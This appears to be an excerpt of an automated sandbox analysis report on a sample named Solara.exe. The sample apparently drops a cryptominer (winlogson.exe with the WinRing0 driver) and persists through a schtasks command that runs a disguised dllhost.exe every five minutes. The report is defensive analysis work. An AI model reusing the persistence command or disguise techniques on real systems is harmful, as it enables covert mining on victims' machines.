                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: Solara.exe.bin.exeStatic file information: File size 1360384 > 1048576
                  Source: Solara.exe.bin.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Users\Administrator\Desktop\Pch3lkinMinerBuilder\Task32Main\Task32Main\obj\Debug\Task32Main.pdb source: Solara.exe.bin.exe, 00000002.00000003.1636690920.0000000001266000.00000004.00000020.00020000.00000000.sdmp, Solara.exe.bin.exe, 00000002.00000003.1636646146.000000000122F000.00000004.00000020.00020000.00000000.sdmp, Z6T9189FJQPDA5HSM49.exe, 00000008.00000000.1036685128.0000000000E22000.00000002.00000001.01000000.00000006.sdmp, Z6T9189FJQPDA5HSM49.exe.2.dr
                  Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: WinRing0x64.sys.8.dr
                  Source: Z6T9189FJQPDA5HSM49.exe.2.drStatic PE information: 0x9A21587A [Mon Dec 11 03:03:22 2051 UTC]
                  Source: Solara.exe.bin.exeStatic PE information: real checksum: 0x0 should be: 0x159282
                  Source: winlogson.exe.8.drStatic PE information: real checksum: 0x7e7c4c should be: 0xaae72
                  Source: Z6T9189FJQPDA5HSM49.exe.2.drStatic PE information: real checksum: 0x0 should be: 0x11c88
                  Source: winlogson.exe.8.drStatic PE information: section name: .xdata
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008FC131 push ds; retf 0_2_008FC136
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_008FC147 push ds; retf 0_2_008FC148
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 0_2_0093DFCA push ecx; ret 0_2_0093DFDD
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_00452068 push ebx; ret 2_2_00452069
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_00451100 pushfd ; retn 0041h2_2_00451101
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_00451D1A push es; retn 0042h2_2_00452065
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0045365F push esi; iretd 2_2_00453660
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0044E7CD push ds; retf 2_2_0044E7D2
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008FC131 push ds; retf 2_2_008FC136
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008FC147 push ds; retf 2_2_008FC148
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_0093DFCA push ecx; ret 2_2_0093DFDD
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeCode function: 2_2_008FA775 push es; iretd 2_2_008FA776
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_05134277 push esp; iretd 11_2_05134282
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_05134288 push esi; iretd 11_2_05134292
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_051342A8 push edi; iretd 11_2_051342B2
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_05131D3B pushad ; iretd 11_2_05131D4A
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_05131D4B pushad ; iretd 11_2_05131D5A
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_05131D7B pushad ; iretd 11_2_05131D9A
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_05131CAB pushad ; iretd 11_2_05131D2A
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_05136F1C pushad ; ret 11_2_05136F23
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_05133862 push cs; iretd 11_2_0513386A
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_08E563AD push ss; iretd 11_2_08E563B2
                  Source: Solara.exe.bin.exeStatic PE information: section name: .text entropy: 7.09207256696417

                  Persistence and Installation Behavior

                  barindex
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeFile created: C:\ProgramData\Dllhost\WinRing0x64.sysJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeFile created: C:\ProgramData\Dllhost\WinRing0x64.sysJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeFile created: C:\ProgramData\Dllhost\winlogson.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeFile created: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeFile created: C:\ProgramData\Dllhost\WinRing0x64.sysJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exeFile created: C:\ProgramData\Dllhost\winlogson.exeJump to dropped file

                  Boot Survival

                  barindex
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Users\user\Desktop\Solara.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
